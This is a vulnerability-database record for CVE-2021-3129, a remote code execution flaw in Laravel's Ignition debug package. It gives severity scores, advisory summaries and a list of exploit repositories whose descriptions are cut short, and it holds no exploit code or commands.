# CVE-2021-3129_exploit
Exploit for CVE-2021-3129
## Lab setup:
...
{"id": "6E0E7058-958F-5D83-9BC3-AC9A1571D8AC", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Vulnerability in Facade Ignition", "description": "# CVE-2021-3129_exploit\nExploit for CVE-2021-3129\n## Lab setup:\n...", "published": "2021-01-27T10:16:35", "modified": "2022-08-10T06:02:18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-3129"], "immutableFields": [], "lastseen": "2022-08-10T06:51:04", "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0030"]}, {"type": "cve", "idList": ["CVE-2021-3129"]}, {"type": "github", "idList": ["GHSA-4QWP-7C67-JMCC"]}, {"type": "githubexploit", "idList": ["015776ED-F570-51F6-BD7B-6A422942FCBB", "272FC334-4DD4-570F-AB53-1BF7758BA869", "35896337-DA85-5D42-B9FC-4DF2E3EC881E", "472CD5C0-023D-5465-BAD9-83CF49B2139D", 
"4EE21D54-330E-5291-B612-7D80CD427AB7", "501BA9BB-F145-529E-BFA9-62A94BCB6191", "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "86E0EEED-C430-5343-BCD1-3FF58D995440", "AF827A23-A60A-565F-B2B6-E5038132A33A", "B4031542-31ED-5A0E-934F-8523687B36BF", "B57BBC1D-AC88-5370-9A63-B487A1331956", "DF739DCB-597D-5266-BFD7-DD6EDEB4ABA4", "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169"]}, {"type": "osv", "idList": ["OSV:GHSA-4QWP-7C67-JMCC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162094", "PACKETSTORM:165999"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:682AF2364002B8852065C1D4694ED089"]}, {"type": "veracode", "idList": ["VERACODE:28976"]}, {"type": "zdt", "idList": ["1337DAY-ID-36079", "1337DAY-ID-37366"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0030"]}, {"type": "cve", "idList": ["CVE-2021-3129"]}, {"type": "github", "idList": ["GHSA-4QWP-7C67-JMCC"]}, {"type": "githubexploit", "idList": ["272FC334-4DD4-570F-AB53-1BF7758BA869", "472CD5C0-023D-5465-BAD9-83CF49B2139D", "501BA9BB-F145-529E-BFA9-62A94BCB6191", "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "AF827A23-A60A-565F-B2B6-E5038132A33A", "B57BBC1D-AC88-5370-9A63-B487A1331956", "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162094"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:682AF2364002B8852065C1D4694ED089"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "zdt", "idList": ["1337DAY-ID-36079"]}]}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1660114366, "score": 1660114387}, "_internal": {"score_hash": "1f20e9558656993ea710146d62e4e49b"}, "privateArea": 1}
{"veracode": [{"lastseen": "2022-07-26T13:32:51", "description": "facade/ignition is vulnerable to arbitrary code execution. The vulnerability exists through stream wrappers in files that do not end of `.blade.php` in `MakeViewVariableOptionalSolution`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T02:33:13", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T11:30:31", "id": "VERACODE:28976", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28976/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-05-12T01:19:27", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). 
This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T20:23:46", "type": "osv", "title": "Unauthenticated remote code execution in Ignition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-03-23T00:13:45", "id": "OSV:GHSA-4QWP-7C67-JMCC", "href": "https://osv.dev/vulnerability/GHSA-4qwp-7c67-jmcc", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:48", "description": "A remote code execution vulnerability exists in Laravel Ignition. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-01T00:00:00", "type": "checkpoint_advisories", "title": "Laravel Ignition Remote Code Execution (CVE-2021-3129)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-02-01T00:00:00", "id": "CPAI-2021-0030", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-17T05:17:58", "description": "# CVE-2021-3129\nPoC for CVE-2021-3129 (Laravel)\n\nFor educational...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-01T09:09:38", "type": 
"githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-06-17T01:52:54", "id": "272FC334-4DD4-570F-AB53-1BF7758BA869", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:48:02", "description": "# Laravel_CVE-2021-3129_EXP\n\u53c2\u8003exp: https://github.com/SNC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-27T05:44:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-21T09:16:22", "id": "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-31T20:42:34", "description": "# Laravel-CVE-2021-3129\nCVE-2021-3129\n\n\n\n## \u63cf\u8ff0\n\n\u6574\u5408https://githu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:58:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-31T02:37:00", "id": "DF739DCB-597D-5266-BFD7-DD6EDEB4ABA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-11T15:20:45", "description": "# laravel-CVE-2021-3129-EXP\n\nCVE-2021-312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-25T08:42:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-11T07:46:44", "id": "015776ED-F570-51F6-BD7B-6A422942FCBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-12T10:44:35", "description": "# CVE-2021-3129\nCVE-2021-3129-Laravel Debug mode \u8fdc\u7a0b\u4ee3\u7801\u6267...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-21T06:27:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-12T03:18:26", "id": "B57BBC1D-AC88-5370-9A63-B487A1331956", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T15:49:15", "description": "# CVE-2021-3129\nLaravel debug rce\n\n# \u98df\u7528\u65b9\u6cd5\n\u6267\u884c`docker-compse up -d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-22T05:12:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-10T11:46:01", "id": "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:13:52", "description": "### 
\u4e3b\u8981\u529f\u80fd\n\t\u9488\u5bf9CVE-2021-3129\u6f0f\u6d1e\u8fdb\u884cGetshell\n\n### \u4f7f\u7528\u65b9\u6cd5\n pyt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-06T14:24:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-11-06T14:27:50", "id": "86E0EEED-C430-5343-BCD1-3FF58D995440", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T16:46:45", "description": "# CVE-2021-3129\nLaravel <= v8.4.2 debug mode: Remote code exe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-18T05:42:13", "type": 
"githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-16T07:16:17", "id": "AF827A23-A60A-565F-B2B6-E5038132A33A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:37:12", "description": "# laravel-exploits\nExploit for CVE-2021-3129\nDetails: https://ww...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T12:52:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-3129"], "modified": "2022-08-15T12:34:47", "id": "501BA9BB-F145-529E-BFA9-62A94BCB6191", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:40:17", "description": "# CVE-2021-3129\nLaravel <= v8.4.2 debug mode: Remote code exe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T06:34:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-05-22T16:10:29", "id": "4EE21D54-330E-5291-B612-7D80CD427AB7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:57", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-14T09:24:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-10-24T10:23:11", "id": "472CD5C0-023D-5465-BAD9-83CF49B2139D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:02:45", "description": "# laravel-CVE-2021-3129-EXP\n\nCVE-2021-312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:35:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-03-01T08:06:10", "id": "B4031542-31ED-5A0E-934F-8523687B36BF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-08T20:10:03", "description": "# CVE-2021-3129 - Laravel RCE\n\n## About\nThe script has been made...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T17:22:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-08T16:50:20", "id": "35896337-DA85-5D42-B9FC-4DF2E3EC881E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:30:25", "description": "## Introduction\nThe application is used for tracking people acco...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
